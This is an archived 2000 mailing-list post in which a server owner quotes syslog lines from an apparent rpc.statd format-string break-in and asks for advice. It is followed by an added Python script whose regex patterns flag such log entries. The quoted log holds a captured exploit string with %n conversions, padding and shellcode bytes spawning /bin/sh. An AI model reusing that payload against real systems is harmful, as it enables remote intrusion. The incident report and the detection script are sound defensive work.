I just realised my earlier tries at sending this message were full of almost 300K of control characters. I am trying again. Apologies if it repeats.
***** Hi all-- I arrived home tonight to see the following message plastered across all my terminal windows on my webserver, ludism.org: Message from [EMAIL PROTECTED] at Sat Sep 30 19:10:53 2000 ... ludism "???" I thought, and checked the system logs, which read as follows for the period in question: Sep 30 19:04:50 ludism inetd[219]: smtp/tcp: bind: Address already in use Sep 30 19:08:01 ludism /USR/SBIN/CRON[32062]: (mail) CMD ( if [ -x /usr/sbin/exim -a -f /etc/exim.conf ]; then /usr/sbin/exim -q >/dev/null 2>&1; fi) Sep 30 19:09:00 ludism innd: ME time 599939 idle 599938(2) artwrite 0(0) artlink 0(0) hiswrite 0(0) hissync 0(3) Sep 30 19:10:53 ludism Sep 30 19:10:53 ludism syslogd: Cannot glue message parts together Sep 30 19:10:53 ludism 173>Sep 30 19:10:53 /sbin/rpc.statd[205]: gethostbyname error for ^Xø^Xø^Yø^Yø^Zø^Zø^[ø^[ø%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêê1¿Î|YâA^PâA^H¿âA^Dâ¿â^AfÕÄ^BâY^LA^NôA^H^PâI^DÄA^D^Là^AfÕÄ^DfÕÄ^E0¿àA^DfÕ Sep 30 19:10:53 ludism «^F/bin«F^D/shA0¿àF^Gâv^LçV^PçN^LâÛ^KÕÄ^AÕÄË Sep 30 19:14:01 ludism /USR/SBIN/CRON[32067]: (news) CMD (rnews -U) Sep 30 19:14:01 ludism innd: ME time 300548 idle 300544(2) artwrite 0(0) artlink 0(0) hiswrite 0(0) hissync 0(3) 

I am far from a security expert, but it looks as though someone might have been running some sort of shell script ("/bin/sh" appears somewhere near the end of the garbage) via rpc. I also read the IP address 236.137.10.192 near the beginning, but can't locate that machine via host or ping.

Was this one of the famous sysklogd exploits? Yes, I was lazy and did not upgrade until tonight, but I fear it may be too late.

I also found a file dated Friday, 22 September 2000, 6:03 PM in my /var/log directory, reading thusly:

µv9tty1 [...a whole lot of invisible characters...] ÐÀ9tty1F*¥9tty2ÿâã8ttyp4c1019188-a.fedwy1.wa.home.comÖd 8tty2®v 8tty22«9pts/563.225.161.91íe9ttyp4www.ludism.org

So, do you think my machine has been cracked? It looks as though they've been trying to cover their tracks, but not doing it very well. If it is a crack, what can I do about it apart from wiping the machine and rebuilding from the ground up?

Thanks...

Ron Hale-Evans

--
Ron's Info Closet: Center for Ludic Synergy, Kennexions Glass Bead Game, Positive Revolution FAQ, Hexagram-8 I Ching Mailing List, and links...
Ron Hale-Evans ... [EMAIL PROTECTED] ... <http://www.apocalypse.org/~rwhe/>
Further up and further in! fnord
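
An added example, not part of the original message: a small log triage script that flags syslog entries showing the traits visible in the rpc.statd entry quoted above (a run of printf-style conversions, a %n conversion, a long run of one repeated non-printable byte, a /bin ... /sh string), rejoining the untagged continuation line that syslogd split off. The function names, thresholds and sample lines are assumptions constructed for illustration.

```python
import re

HEADER = re.compile(r"^(\w{3} [ \d]\d \d\d:\d\d:\d\d) (\S+) (.*)$")
# Optional relayed "<pri>Mon DD HH:MM:SS " prefix, then "program[pid]: "
TAG = re.compile(r"^(?:\S+ \d+ [\d:]+ )?([\w./-]+)(?:\[\d+\])?: ")

INDICATORS = {
    "format-conversions": re.compile(r"(?:%\d*[diouxXspn]){4,}"),
    "percent-n": re.compile(r"%\d*n"),  # %n makes printf-family calls write to memory
    "repeated-byte-run": re.compile(r"([^\x20-\x7e])\1{31,}"),
    "shell-path": re.compile(r"/bin.{0,8}/sh"),
}

def group_entries(lines):
    """Rejoin split entries: an untagged line with the same timestamp and
    host as the previous entry is treated as that entry's continuation."""
    entries = []
    for line in lines:
        m = HEADER.match(line.rstrip("\n"))
        if not m:
            continue  # no timestamp/host/body triple, nothing to inspect
        stamp, host, body = m.groups()
        tag = TAG.match(body)
        if tag:
            prog = tag.group(1).rsplit("/", 1)[-1]
            entries.append({"stamp": stamp, "host": host,
                            "prog": prog, "text": body[tag.end():]})
        elif entries and (entries[-1]["stamp"], entries[-1]["host"]) == (stamp, host):
            entries[-1]["text"] += body
        else:
            entries.append({"stamp": stamp, "host": host, "prog": None, "text": body})
    return entries

def suspicious(lines, min_hits=2):
    """Return (timestamp, program, indicator names) for entries with >= min_hits."""
    found = []
    for e in group_entries(lines):
        hits = [name for name, rx in INDICATORS.items() if rx.search(e["text"])]
        if len(hits) >= min_hits:
            found.append((e["stamp"], e["prog"], hits))
    return found

# Constructed sample lines shaped like the log above; the bytes are harmless filler.
SAMPLE = [
    "Sep 30 19:08:01 host /USR/SBIN/CRON[32062]: (mail) CMD (/usr/sbin/exim -q)",
    "Sep 30 19:10:53 host syslogd: Cannot glue message parts together",
    "Sep 30 19:10:53 host 173>Sep 30 19:10:53 /sbin/rpc.statd[205]: gethostbyname "
    "error for %8x%8x%8x%8x%236x%n%137x%n" + "\xea" * 64,
    "Sep 30 19:10:53 host \xab/bin\xabF/sh",
    "Sep 30 19:14:01 host /USR/SBIN/CRON[32067]: (news) CMD (rnews -U)",
]

if __name__ == "__main__":
    for stamp, prog, hits in suspicious(SAMPLE):
        print(stamp, prog, ", ".join(hits))
```
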